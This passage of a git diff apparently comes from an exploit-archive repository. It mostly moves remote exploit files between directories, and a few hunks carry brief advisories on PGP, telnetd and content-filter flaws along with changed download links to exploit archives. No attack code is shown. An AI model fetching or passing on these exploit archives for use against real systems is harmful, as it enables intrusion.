platforms/multiple/remote/20467.txt rename to exploits/multiple/remote/20467.txt diff --git a/platforms/multiple/remote/20468.txt b/exploits/multiple/remote/20468.txt similarity index 100% rename from platforms/multiple/remote/20468.txt rename to exploits/multiple/remote/20468.txt diff --git a/platforms/multiple/remote/20472.txt b/exploits/multiple/remote/20472.txt similarity index 100% rename from platforms/multiple/remote/20472.txt rename to exploits/multiple/remote/20472.txt diff --git a/platforms/multiple/remote/20491.txt b/exploits/multiple/remote/20491.txt similarity index 100% rename from platforms/multiple/remote/20491.txt rename to exploits/multiple/remote/20491.txt diff --git a/platforms/multiple/remote/20507.txt b/exploits/multiple/remote/20507.txt similarity index 100% rename from platforms/multiple/remote/20507.txt rename to exploits/multiple/remote/20507.txt diff --git a/platforms/multiple/remote/20513.txt b/exploits/multiple/remote/20513.txt similarity index 100% rename from platforms/multiple/remote/20513.txt rename to exploits/multiple/remote/20513.txt diff --git a/platforms/multiple/remote/20516.txt b/exploits/multiple/remote/20516.txt similarity index 100% rename from platforms/multiple/remote/20516.txt rename to exploits/multiple/remote/20516.txt diff --git a/platforms/multiple/remote/20519.c b/exploits/multiple/remote/20519.c similarity index 100% rename from platforms/multiple/remote/20519.c rename to exploits/multiple/remote/20519.c diff --git a/platforms/multiple/remote/20529.pl b/exploits/multiple/remote/20529.pl similarity index 100% rename from platforms/multiple/remote/20529.pl rename to exploits/multiple/remote/20529.pl diff --git a/platforms/multiple/remote/2053.rb b/exploits/multiple/remote/2053.rb similarity index 100% rename from platforms/multiple/remote/2053.rb rename to exploits/multiple/remote/2053.rb diff --git a/platforms/multiple/remote/20530.sh b/exploits/multiple/remote/20530.sh similarity index 100% rename from platforms/multiple/remote/20530.sh rename to exploits/multiple/remote/20530.sh diff --git a/platforms/multiple/remote/20537.txt b/exploits/multiple/remote/20537.txt similarity index 100% rename from platforms/multiple/remote/20537.txt rename to exploits/multiple/remote/20537.txt diff --git a/platforms/multiple/remote/20591.txt b/exploits/multiple/remote/20591.txt similarity index 100% rename from platforms/multiple/remote/20591.txt rename to exploits/multiple/remote/20591.txt diff --git a/platforms/multiple/remote/20595.txt b/exploits/multiple/remote/20595.txt similarity index 100% rename from platforms/multiple/remote/20595.txt rename to exploits/multiple/remote/20595.txt diff --git a/platforms/multiple/remote/20601.txt b/exploits/multiple/remote/20601.txt similarity index 100% rename from platforms/multiple/remote/20601.txt rename to exploits/multiple/remote/20601.txt diff --git a/platforms/multiple/remote/2061.txt b/exploits/multiple/remote/2061.txt similarity index 100% rename from platforms/multiple/remote/2061.txt rename to exploits/multiple/remote/2061.txt diff --git a/platforms/multiple/remote/20618.txt b/exploits/multiple/remote/20618.txt similarity index 100% rename from platforms/multiple/remote/20618.txt rename to exploits/multiple/remote/20618.txt diff --git a/platforms/multiple/remote/20625.txt b/exploits/multiple/remote/20625.txt similarity index 100% rename from platforms/multiple/remote/20625.txt rename to exploits/multiple/remote/20625.txt diff --git a/platforms/multiple/remote/20635.txt b/exploits/multiple/remote/20635.txt similarity index 100% rename from platforms/multiple/remote/20635.txt rename to exploits/multiple/remote/20635.txt diff --git a/platforms/multiple/remote/20638.txt b/exploits/multiple/remote/20638.txt similarity index 100% rename from platforms/multiple/remote/20638.txt rename to exploits/multiple/remote/20638.txt diff --git a/platforms/multiple/remote/20639.txt b/exploits/multiple/remote/20639.txt similarity index 100% rename from platforms/multiple/remote/20639.txt rename to exploits/multiple/remote/20639.txt diff --git a/platforms/multiple/remote/20685.txt b/exploits/multiple/remote/20685.txt similarity index 94% rename from platforms/multiple/remote/20685.txt rename to exploits/multiple/remote/20685.txt index b8f313f07..a75adb87b 100644 --- a/platforms/multiple/remote/20685.txt +++ b/exploits/multiple/remote/20685.txt @@ -8,4 +8,4 @@ Compromise of the user accounts could result in disclosure of sensitive informat Compromise of administrator accounts could result in disclosure of sensitive information, changes to website functionality, and, potentially, could assist in further compromises of security on the affected host. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20685.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20685.zip \ No newline at end of file diff --git a/platforms/multiple/remote/20692.pl b/exploits/multiple/remote/20692.pl similarity index 100% rename from platforms/multiple/remote/20692.pl rename to exploits/multiple/remote/20692.pl diff --git a/platforms/multiple/remote/20693.c b/exploits/multiple/remote/20693.c similarity index 100% rename from platforms/multiple/remote/20693.c rename to exploits/multiple/remote/20693.c diff --git a/platforms/multiple/remote/20694.pl b/exploits/multiple/remote/20694.pl similarity index 100% rename from platforms/multiple/remote/20694.pl rename to exploits/multiple/remote/20694.pl diff --git a/platforms/multiple/remote/20695.pl b/exploits/multiple/remote/20695.pl similarity index 100% rename from platforms/multiple/remote/20695.pl rename to exploits/multiple/remote/20695.pl diff --git a/platforms/multiple/remote/20719.txt b/exploits/multiple/remote/20719.txt similarity index 100% rename from platforms/multiple/remote/20719.txt rename to exploits/multiple/remote/20719.txt diff --git a/platforms/multiple/remote/20722.txt b/exploits/multiple/remote/20722.txt similarity index 100% rename from platforms/multiple/remote/20722.txt rename to exploits/multiple/remote/20722.txt diff --git a/platforms/multiple/remote/20738.txt b/exploits/multiple/remote/20738.txt similarity index 93% rename from platforms/multiple/remote/20738.txt rename to exploits/multiple/remote/20738.txt index ecbbb650f..a7ecebe1d 100644 --- a/platforms/multiple/remote/20738.txt +++ b/exploits/multiple/remote/20738.txt @@ -6,4 +6,4 @@ When a user opens a document for verification in PGP, its corresponding .sig fil Due to a flaw in the implementation of the decoder, an arbitrary file can be created on a users system. The file created would be of the attackers choice. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20738.doc.sig \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20738.doc.sig \ No newline at end of file diff --git a/platforms/multiple/remote/20797.txt b/exploits/multiple/remote/20797.txt similarity index 100% rename from platforms/multiple/remote/20797.txt rename to exploits/multiple/remote/20797.txt diff --git a/platforms/multiple/remote/20807.txt b/exploits/multiple/remote/20807.txt similarity index 100% rename from platforms/multiple/remote/20807.txt rename to exploits/multiple/remote/20807.txt diff --git a/platforms/multiple/remote/2082.html b/exploits/multiple/remote/2082.html similarity index 100% rename from platforms/multiple/remote/2082.html rename to exploits/multiple/remote/2082.html diff --git a/platforms/multiple/remote/20869.html b/exploits/multiple/remote/20869.html similarity index 100% rename from platforms/multiple/remote/20869.html rename to exploits/multiple/remote/20869.html diff --git a/platforms/multiple/remote/20881.txt b/exploits/multiple/remote/20881.txt similarity index 92% rename from platforms/multiple/remote/20881.txt rename to exploits/multiple/remote/20881.txt index 6564a65bd..756ebb979 100644 --- a/platforms/multiple/remote/20881.txt +++ b/exploits/multiple/remote/20881.txt @@ -5,4 +5,4 @@ The IPC@Chip is a single-chip embedded webserver from Beck GmbH. The device's inbuilt telnetd service may allow a remote user to repeatedly attempt to login to a given account, without logging or responding to repeated failed login attempts. This could permit an attacker to brute-force a known account name, potentially leading to a compromise of the device's accounts and/or allowing a compromise of its function. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20881.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20881.zip \ No newline at end of file diff --git a/platforms/multiple/remote/20882.txt b/exploits/multiple/remote/20882.txt similarity index 100% rename from platforms/multiple/remote/20882.txt rename to exploits/multiple/remote/20882.txt diff --git a/platforms/multiple/remote/20889.txt b/exploits/multiple/remote/20889.txt similarity index 90% rename from platforms/multiple/remote/20889.txt rename to exploits/multiple/remote/20889.txt index 93fba35b1..d9a6aceee 100644 --- a/platforms/multiple/remote/20889.txt +++ b/exploits/multiple/remote/20889.txt @@ -6,4 +6,4 @@ It is possible for attackers to create an encrypted document that will exploit a This vulnerability may lead to remote attackers gaining access to client hosts. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20889.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20889.tar.gz \ No newline at end of file diff --git a/platforms/multiple/remote/20890.txt b/exploits/multiple/remote/20890.txt similarity index 100% rename from platforms/multiple/remote/20890.txt rename to exploits/multiple/remote/20890.txt diff --git a/platforms/multiple/remote/20891.txt b/exploits/multiple/remote/20891.txt similarity index 90% rename from platforms/multiple/remote/20891.txt rename to exploits/multiple/remote/20891.txt index 9d0c20c69..54799db3f 100644 --- a/platforms/multiple/remote/20891.txt +++ b/exploits/multiple/remote/20891.txt @@ -4,4 +4,4 @@ eSafe Gateway is a security utility used for filtering internet content. An html file may be crafted to bypass the script-filtering feature offered by eSafe Gateway. This is done by simply encoding the